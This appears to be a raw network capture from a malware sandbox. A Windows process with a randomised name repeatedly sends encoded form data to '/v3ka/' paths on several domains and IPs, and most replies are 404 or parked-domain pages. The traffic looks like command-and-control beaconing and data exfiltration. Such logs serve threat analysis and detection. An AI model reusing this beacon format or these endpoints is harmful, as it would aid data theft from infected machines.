                                                                                    Origin: http://www.b-r-consulting.ch
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Content-Length: 225
                                                                                    Cache-Control: max-age=0
                                                                                    Referer: http://www.b-r-consulting.ch/v3ka/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Data Ascii: c4qx7JIP=WZ7pvUHO5mWQKs59w9YDE8V1AF9NiMJuj0wymK2LrF3yZIw3n5xvMM2nFFez3EtSTbjcGE1uSxE5OIFqskelumraWBia4qx6UACxr+zoHSp2gdJe1pXmwIJWoX/WeT7IrNz51R3WeZ8MefCCJs3xu9WFztSp4eOxweF/6F2Ca4+08RSJpFl03DVmyrkBqvetmBjTAX7FrwBLQkXgaZDCHvw=
                                                                                    Mar 18, 2024 15:09:38.202873945 CET | 376 | IN | HTTP/1.1 404 Not Found
                                                                                    Server: nginx
                                                                                    Date: Mon, 18 Mar 2024 14:09:38 GMT
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    Content-Encoding: br


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    15 | 192.168.11.30 | 49826 | 194.191.24.38 | 80 | 6944 | C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Mar 18, 2024 15:09:40.716069937 CET | 1676 | OUT | POST /v3ka/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.b-r-consulting.ch
                                                                                    Origin: http://www.b-r-consulting.ch
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Content-Length: 1141
                                                                                    Cache-Control: max-age=0
                                                                                    Referer: http://www.b-r-consulting.ch/v3ka/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Mar 18, 2024 15:09:40.904642105 CET | 376 | IN | HTTP/1.1 404 Not Found
                                                                                    Server: nginx
                                                                                    Date: Mon, 18 Mar 2024 14:09:40 GMT
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    Content-Encoding: br


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    16 | 192.168.11.30 | 49827 | 194.191.24.38 | 80 | 6944 | C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Mar 18, 2024 15:09:43.418492079 CET | 463 | OUT | GET /v3ka/?c4qx7JIP=bbTJsjbns1egJ9JPkt58MNAjZkRhgchDkV02q5vokHm6S8Qgk9c4A4/rVALt8kpaWPL/RyZRbRAxNoIAik6Ahn7XchDP755TKRWw96XVZ2F1n8YO16SVy/I=&K4W=bb2HuFjPIN HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.b-r-consulting.ch
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Mar 18, 2024 15:09:43.606676102 CET | 389 | IN | HTTP/1.1 404 Not Found
                                                                                    Server: nginx
                                                                                    Date: Mon, 18 Mar 2024 14:09:43 GMT
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Content-Length: 203
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /v3ka/ was not found on this server.</p></body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    17 | 192.168.11.30 | 49828 | 84.32.84.32 | 80 | 6944 | C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Mar 18, 2024 15:09:48.984802008 CET | 754 | OUT | POST /v3ka/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.teenpattimasterapp.org
                                                                                    Origin: http://www.teenpattimasterapp.org
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Content-Length: 205
                                                                                    Cache-Control: max-age=0
                                                                                    Referer: http://www.teenpattimasterapp.org/v3ka/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Data Ascii: c4qx7JIP=hgTlIlyCji2xVlqmWmzQPfZz/KCix/kUPobe11amEXUPV/FDQ/QEQpHIU4NLfmaVxau3eLA3c0QkAPG57rgGnkTcVKbswfynRB/RGp508x8jGhCXeU8V87nhHNeqcZZNS5gBhTvewCiLJrzk3HnYyID/TEHrDLJJpTHgem3Z4mP89y2M1c63b+TrTe0Tz2RPtg==


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    18 | 192.168.11.30 | 49829 | 84.32.84.32 | 80 | 6944 | C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Mar 18, 2024 15:09:51.666555882 CET | 774 | OUT | POST /v3ka/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.teenpattimasterapp.org
                                                                                    Origin: http://www.teenpattimasterapp.org
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Content-Length: 225
                                                                                    Cache-Control: max-age=0
                                                                                    Referer: http://www.teenpattimasterapp.org/v3ka/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Data Ascii: c4qx7JIP=hgTlIlyCji2xH0amRFLQI/ZyzqCi6fkYPoHe1xCPFlwPQu1DR94ETpHIGYNORGaexaqReJU3c3skANe56agFm0TeN6buvvynRB/RGpte8wUjaBSXZAQK6LniGNeqX5YES5gnhRL0wAKLJuPk0SLZr4C0N0GHIb8+gQT2PnHS+DP01FHWofO1IevGPfZ7x0QUwpmJ++dSoR7OIZJhjdQJ/S4=


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    19 | 192.168.11.30 | 49830 | 84.32.84.32 | 80 | 6944 | C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Mar 18, 2024 15:09:54.337655067 CET | 1691 | OUT | POST /v3ka/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.teenpattimasterapp.org
                                                                                    Origin: http://www.teenpattimasterapp.org
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Content-Length: 1141
                                                                                    Cache-Control: max-age=0
                                                                                    Referer: http://www.teenpattimasterapp.org/v3ka/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Data Ascii: c4qx7JIP=hgTlIlyCji2xH0amRFLQI/ZyzqCi6fkYPoHe1xCPFl4PMM9DQc4ESpHIFYNPRGa5xaSNeJYncxgkauW5zIYFo0TeRKbvwfy+RHfVGqVe8wUjaDaXK08K4LnhHNemcZYoS5pchRfOwxqLJP/kkwzZj4C2M0GfIbghgQfQPkaF+ED0xTbA1vKBecmOBrJY+ngH7eq1zt5fozjpAJRC5eIj+HIababuLusXjUKCuPSa30LNSK1lDF3VupfiOIrErlJtDN2M6QlLc/D1D1nhPcn62em/ftLkIQwuhHVgCfx7el1tRFtAi1WMYVqZBF2cP2OgGr8wb+kFnsAhV4xAChEmnSXLrXMIcrQx/mud/a1UvZcSHjJsKIApzIiCfiPOe/Kczd3StjVicb7oKl3N5Wao+y0RYcc4EgjVEJsAHm8OBQyHT2xkpJN2kfnGDWO9dzyAiLcNYE+cbxxRKuoYU+1zQ8eCIvK/z6b8F1eDZ2v7+U36OFXlj2vU4ciDfiiaEqscfjDqK4nqcYU2yy1DgDAl1wL5IIvnnUFtJvq2H92eHrECq6M9CptgKEUjl4iXdHgc1p+IgjG0+rHEVZsGmH7tf03Ar2xeBjq0PQmCayMV3oVcvO7dX2ZHSQIjIPYsYoEZThYOwJq/ysXTKOUGOtbJcjvpOv1ptklFQWpdCixNy6qpeem4z0IPBR0mSj3zFvMiUZhUhBGADTbztQ6tAqWia5twQU9YadRo5/lXjEdp9LM2ePKd4qyHVzZ+8zPKX3yonQCFb4yKDtuZ741xDAfEJrcMH+WQsfDSLZVAecAXjUEEqhIGouZ3Ho9f+On3q0PYzR3Jmv369laRB8vUxlK5g0iD2GedTF2PkNS8oWy9s8hA9aVt/QU6liMwfipgHXzSQr9JGCJgogEU78hDNpdptYJThLCAk+YS9mM403N1AdJGcMHD43WgYYlzpbBi3hw50m7loUWA2OZ6wcTEMHQhOJJ18xRZ5HofY5IPlp04DyC+T35vk9AwA8Dd5f+b+ZhufI5DPPQhIvliKrzYuo5m0IcIgzQmURZUpm4dRatLCtLl6MwNludOSXTlJxK5XyGTEwdW0PEPS8fbOCWEySOWQ7ah6skSEyM54zYKpPw+kGRL


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    20 | 192.168.11.30 | 49831 | 84.32.84.32 | 80 | 6944 | C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Mar 18, 2024 15:09:57.009166956 CET | 468 | OUT | GET /v3ka/?c4qx7JIP=si7FLVHJ8iWuYVaGSkvjNM53tbCy++USJ5em8DLLO2leI9d5bok8bcXzE4IwU2K08OGpdZcld0QPM+bL/KkbuGKMc/2hsM2YOWzLfNROmTcvWRWJJAUk/s4=&K4W=bb2HuFjPIN HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.teenpattimasterapp.org
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Mar 18, 2024 15:09:57.164010048 CET | 1286 | IN | HTTP/1.1 200 OK
                                                                                    Server: hcdn
                                                                                    Date: Mon, 18 Mar 2024 14:09:57 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 10066
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    x-hcdn-request-id: 8af7f363c2afd123a3f4a4c3defa5c90-phx-edge2
                                                                                    Expires: Mon, 18 Mar 2024 14:09:56 GMT
                                                                                    Cache-Control: no-cache
                                                                                    Accept-Ranges: bytes
                                                                                    Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"Open Sans",Helvetica,sans-serif;color:#000;padding
                                                                                    Mar 18, 2024 15:09:57.164093971 CET | 1286 | IN
                                                                                    Data Ascii: :0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!important;color:#333}h2{font-size:24px;font-weigh
                                                                                    Mar 18, 2024 15:09:57.164180994 CET | 1286 | IN
                                                                                    Data Ascii: r:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-container{display:flex;flex-direction:row}.message-subtitle{color:#2f1c6a;font-weight:700;font-size:2
                                                                                    Mar 18, 2024 15:09:57.164268970 CET | 1286 | IN
                                                                                    Data Ascii: ge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-align:center;display:inline-block;padding:4px 8px;font-weight:700;border-radius:4px;background-color:#fc5185}@media screen and (max-width:768px){.mess
                                                                                    Mar 18, 2024 15:09:57.164375067 CET | 1286 | IN
                                                                                    Data Ascii: ger.com/tutorials rel=nofollow><i aria-hidden=true class="fas fa-graduation-cap"></i> Tutorials</a></li><li><a href=https://support.hostinger.com/en/ rel=nofollow><i aria-hidden=true class="fa-readme fab"></i>Knowledge base</a></li><li><a href
                                                                                    Mar 18, 2024 15:09:57.164390087 CET | 1286 | IN
                                                                                    Data Ascii: y website hosting for your successful online projects.</p><br><a href=https://www.hostinger.com rel=nofollow>Find your hosting plan</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-ti
                                                                                    Mar 18, 2024 15:09:57.164464951 CET | 1286 | IN
                                                                                    Data Ascii: for(var r,e=[],n=0,t=o.length;n<t;){if(55296==(63488&(r=o[n++])))throw new RangeError("UTF-16(encode): Illegal UTF-16 value");65535<r&&(r-=65536,e.push(String.fromCharCode(r>>>10&1023|55296)),r=56320|1023&r),e.push(String.fromCharCode(r))}retu
                                                                                    Mar 18, 2024 15:09:57.164586067 CET | 1286 | IN
                                                                                    Data Ascii: 1)-65<26),m.splice(f,0,a),f++}if(t)for(f=0,w=m.length;f<w;f++)y[f]&&(m[f]=String.fromCharCode(m[f]).toUpperCase().charCodeAt(0));return this.utf16.encode(m)},this.encode=function(t,a){var h,f,i,c,u,d,l,p,g,s,C,w;a&&(w=this.utf16.decode(t));var
                                                                                    Mar 18, 2024 15:09:57.164623022 CET | 118 | IN
                                                                                    Data Ascii: .location.hostname,account=document.getElementById("pathName");account.innerHTML=punycode.ToUnicode(pathName)</script>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    21 | 192.168.11.30 | 49832 | 62.149.128.45 | 80 | 6944 | C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Mar 18, 2024 15:10:02.687062025 CET | 730 | OUT | POST /v3ka/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.clarycyber.com
                                                                                    Origin: http://www.clarycyber.com
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Content-Length: 205
                                                                                    Cache-Control: max-age=0
                                                                                    Referer: http://www.clarycyber.com/v3ka/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Data Ascii: c4qx7JIP=E6oTgpeoekQCKUxb964XXoXLQma5Frau8tZG6W/UrccktkvjnjaTan1XwaKkx1JT6tS56G1VxXT140WHqMWfDHQTFDVf9hx0nGqT402S6t5Jn+bjqx2pnJQrWvnrKqPiLXvyMBi2IrigIc6sAb03/5tJ6K+WQi8UMI3WXMfCojMSxWqP5/5IkIPEb0RpQBgBCg==
                                                                                    Mar 18, 2024 15:10:02.880801916 CET | 1286 | IN | HTTP/1.1 404 Not Found
                                                                                    Cache-Control: private
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Server: Microsoft-IIS/10.0
                                                                                    X-Powered-By: ASP.NET
                                                                                    Date: Mon, 18 Mar 2024 14:10:01 GMT
                                                                                    Connection: close
                                                                                    Content-Length: 4956
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;
Mar 18, 2024 15:10:02.880886078 CET | 1286 | IN
                                                                                    Data Ascii: color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relativ
Mar 18, 2024 15:10:02.881038904 CET | 1286 | IN
                                                                                    Data Ascii: 33;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 - Not Found</h3> <h4>The resource you are looking for has been removed, had its name changed, or i
Mar 18, 2024 15:10:02.881053925 CET | 1286 | IN
                                                                                    Data Ascii: sp;IIS Web Core</td></tr> <tr><th>Notification</th><td>&nbsp;&nbsp;&nbsp;MapRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>&nbsp;&nbsp;&nbsp;StaticFile</td></tr> <tr><th>Error Code</th><td>&nbsp;&nbsp;&nbsp;0x80070
Mar 18, 2024 15:10:02.881067038 CET | 31 | IN
                                                                                    Data Ascii: iv> </div> </body> </html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.11.30 | 49833 | 62.149.128.45 | 80 | 6944 | C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
Timestamp | Bytes transferred | Direction | Data
Mar 18, 2024 15:10:05.405242920 CET | 750 | OUT | POST /v3ka/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.clarycyber.com
                                                                                    Origin: http://www.clarycyber.com
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Content-Length: 225
                                                                                    Cache-Control: max-age=0
                                                                                    Referer: http://www.clarycyber.com/v3ka/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Data Ascii: c4qx7JIP=E6oTgpeoekQCJ0hb+ZAXeoXIaGa5KLbG8tVG6XLEsuIktF/j2RiTZn1X76KhvFJi6tuA6DNVxXX14xqHt9WQBXQdOjVdwBx0nGqT4we86thJkPrjrTe245QoA/nrd6PmLXvcME6QIu+gIY+sEa0ww5tP+K/EWTh/FMHjW9DZjjsNwBbVk8NK3ozpH18BSDhafowRz+1JLQLP6GU75naCx+M=
Mar 18, 2024 15:10:05.599039078 CET | 1286 | IN | HTTP/1.1 404 Not Found
                                                                                    Cache-Control: private
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Server: Microsoft-IIS/10.0
                                                                                    X-Powered-By: ASP.NET
                                                                                    Date: Mon, 18 Mar 2024 14:10:04 GMT
                                                                                    Connection: close
                                                                                    Content-Length: 4956
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;
Mar 18, 2024 15:10:05.599066019 CET | 1286 | IN
                                                                                    Data Ascii: color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relativ
Mar 18, 2024 15:10:05.599085093 CET | 1286 | IN
                                                                                    Data Ascii: 33;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 - Not Found</h3> <h4>The resource you are looking for has been removed, had its name changed, or i
Mar 18, 2024 15:10:05.599227905 CET | 1286 | IN
                                                                                    Data Ascii: sp;IIS Web Core</td></tr> <tr><th>Notification</th><td>&nbsp;&nbsp;&nbsp;MapRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>&nbsp;&nbsp;&nbsp;StaticFile</td></tr> <tr><th>Error Code</th><td>&nbsp;&nbsp;&nbsp;0x80070
Mar 18, 2024 15:10:05.599247932 CET | 31 | IN
                                                                                    Data Ascii: iv> </div> </body> </html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.11.30 | 49834 | 62.149.128.45 | 80 | 6944 | C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
Timestamp | Bytes transferred | Direction | Data
Mar 18, 2024 15:10:08.123799086 CET | 1667 | OUT | POST /v3ka/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.clarycyber.com
                                                                                    Origin: http://www.clarycyber.com
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Content-Length: 1141
                                                                                    Cache-Control: max-age=0
                                                                                    Referer: http://www.clarycyber.com/v3ka/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Mar 18, 2024 15:10:08.318068027 CET | 1286 | IN | HTTP/1.1 404 Not Found
                                                                                    Cache-Control: private
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Server: Microsoft-IIS/10.0
                                                                                    X-Powered-By: ASP.NET
                                                                                    Date: Mon, 18 Mar 2024 14:10:07 GMT
                                                                                    Connection: close
                                                                                    Content-Length: 4956
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;
Mar 18, 2024 15:10:08.318180084 CET | 1286 | IN
                                                                                    Data Ascii: color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relativ
Mar 18, 2024 15:10:08.318315983 CET | 1286 | IN
                                                                                    Data Ascii: 33;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 - Not Found</h3> <h4>The resource you are looking for has been removed, had its name changed, or i
Mar 18, 2024 15:10:08.318330050 CET | 1286 | IN
                                                                                    Data Ascii: sp;IIS Web Core</td></tr> <tr><th>Notification</th><td>&nbsp;&nbsp;&nbsp;MapRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>&nbsp;&nbsp;&nbsp;StaticFile</td></tr> <tr><th>Error Code</th><td>&nbsp;&nbsp;&nbsp;0x80070
Mar 18, 2024 15:10:08.318340063 CET | 31 | IN
                                                                                    Data Ascii: iv> </div> </body> </html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.11.30 | 49835 | 62.149.128.45 | 80 | 6944 | C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
Timestamp | Bytes transferred | Direction | Data
Mar 18, 2024 15:10:10.841500998 CET | 460 | OUT | GET /v3ka/?c4qx7JIP=J4AzjciiJVojUGFuzrYbXLmTAhGMI5W/z8Zu4GWgm/9FzWPCzEiuTS1rwMX9pE5r2vC14B8Wx1zW9w/trsCTKSg2AEld6ylXwESzvlSrq/FwhsHRtw64/YA=&K4W=bb2HuFjPIN HTTP/1.1
